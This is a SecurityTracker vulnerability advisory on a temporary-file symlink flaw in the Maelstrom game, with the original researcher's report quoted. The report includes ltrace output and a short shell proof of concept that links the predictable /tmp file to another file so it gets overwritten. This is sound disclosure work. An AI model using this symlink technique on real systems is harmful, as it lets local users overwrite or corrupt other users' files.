SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Game)  >   Maelstrom Vendors:   Lantinga, Sam
Maelstrom Game Temporary File Symbolic Link Flaw Lets Local Users Cause Files on the System to Be Overwritten
SecurityTracker Alert ID:  1003317
SecurityTracker URL:  http://securitytracker.com/id/1003317
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Updated:  Jan 22 2002
Original Entry Date:  Jan 22 2002
Impact:   Modification of system information, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 3.0.1
Description:   A temporary file symbolic link vulnerability was reported in the Maelstrom game. A local user may be able to cause files to be overwritten on the system.

It is reported that Maelstrom uses a predictable temporary file name and does not check for existing symbolic links (symlinks) when creating the temporary file. A local user can create a symlink from the temporary file name to another critical file on the system. Then, when another user executes Maelstrom, the linked file will be overwritten with the privileges of the other user.

Impact:   A local user can cause certain files to be overwritten when another user runs the Maelstrom game.
Solution:   The vendor has fixed the vulnerability in the current version (3.0.5), available at:

http://www.devolution.com/~slouken/Maelstrom/binary.html

Vendor URL:  www.devolution.com/~slouken/Maelstrom/ (Links to External Site)
Cause:   Access control error, State error
Underlying OS:  Linux (Any), UNIX (Any)
Underlying OS Comments:  Tested on Red Hat Linux 7.1

Message History:   None.


 Source Message Contents

Subject:  Maelstrom 1.4.3 abartity file overwrite


Program: Maelstrom
Version: 1.4.3
Distribution: RedHat 7.1

When trying to break stuff, ltracing Maelstrom showed the following:

fopen("/tmp/f", "w")                              = 0x08081f58
fprintf(0x08081f58, "Main program = %s\n", "Maelstrom") = 25
fclose(0x08081f58)                                = 0

Which made we wonder if it followed symbolic links, by doing

[andrewg@blackhole andrewg]$ rm -f /tmp/f; (umask 077; echo bla >  /tmp/bla; \
ln -s /tmp/bla f)

at which point I ran it again, and when I did cat /tmp/bla, I got

Main program = Maelstrom

Conclusion:
-=-=-=-=-=-

You can overwrite arbitrary files with the permissions of the user who ran
it.

Of course, this won't work on systems that have linking restrictions in /tmp.

Fixing it
-=-=-=-=-

Remove the code that does the above.


--
www.tasmail.com


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC